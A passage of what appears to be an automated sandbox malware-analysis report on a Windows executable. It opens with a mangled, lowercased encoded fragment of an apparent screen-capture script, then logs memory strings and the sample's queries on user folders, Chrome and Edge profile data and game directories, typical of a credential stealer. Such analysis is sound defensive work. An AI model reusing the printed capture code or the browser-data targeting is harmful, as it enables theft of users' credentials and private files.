jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiabtJump to behavior
                      Source: WdlA0C4PkO.exe, 00000000.00000003.2020963159.000000C00325E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: new tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram Managerprogram managerDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeh
                      Source: WdlA0C4PkO.exe, 00000000.00000003.2075138606.000000C00012A000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1635706527.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1538180801.000000C0001C6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1740768718.000000C0002A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: program managerDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault ime
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1635706527.000000C00025C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: new tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram Managerprogram managerDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IME
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1474092384.000000C000F10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: New Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram Managerprogram managerDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefaul
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1990022251.000000C000152000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: new tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram Managerprogram managerDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault ime
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1538180801.000000C0001C6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: New Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram Managerprogram managerDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault ime
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1740768718.000000C0002A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: New Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram ManagerHTTP/1.1 200 OK
                      Source: WdlA0C4PkO.exe, 00000000.00000003.2075138606.000000C00012A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: New Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram Managerprogram managerDefault IME
                      Source: WdlA0C4PkO.exe, 00000000.00000003.2078092477.000000C004CD4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: new tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram Managerprogram managerDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IME
                      Source: WdlA0C4PkO.exe, 00000000.00000003.2075138606.000000C00012A000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1635706527.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1538180801.000000C0001C6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: program manager
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1544607957.000000C000146000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: New Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram Managerprogram managerDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault ime l
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Default\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Default\Downloads VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Default\Documents VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Default\Documents\My Music VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Default\Documents\My Pictures VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Default\Documents\My Videos VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Default\Videos VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Default\Pictures VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Default\Music VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Default\OneDrive VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Public\Downloads VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Public\Documents VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Public\Documents\My Music VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Default\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Default\Documents\My Music VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Default\Documents\My Pictures VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Default\Pictures VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Default\Music VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Public\Desktop VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Public\Documents\My Music VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\Public\Videos VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\Desktop\WUTJSCBCFX VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\Downloads VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\Documents\AFWAAFRXKO VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\Documents\LTKMYBSEYZ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\Documents\My Music VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\Documents\My Videos VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\Documents\ONBQCLYSPU VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\Documents\XZXHAVGRAG VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\Documents\My Music VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\Documents\My Pictures VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\Documents\ONBQCLYSPU VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default\Epic Games VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default\Minecraft VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Fre VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing VolumeInformationJump to behavior
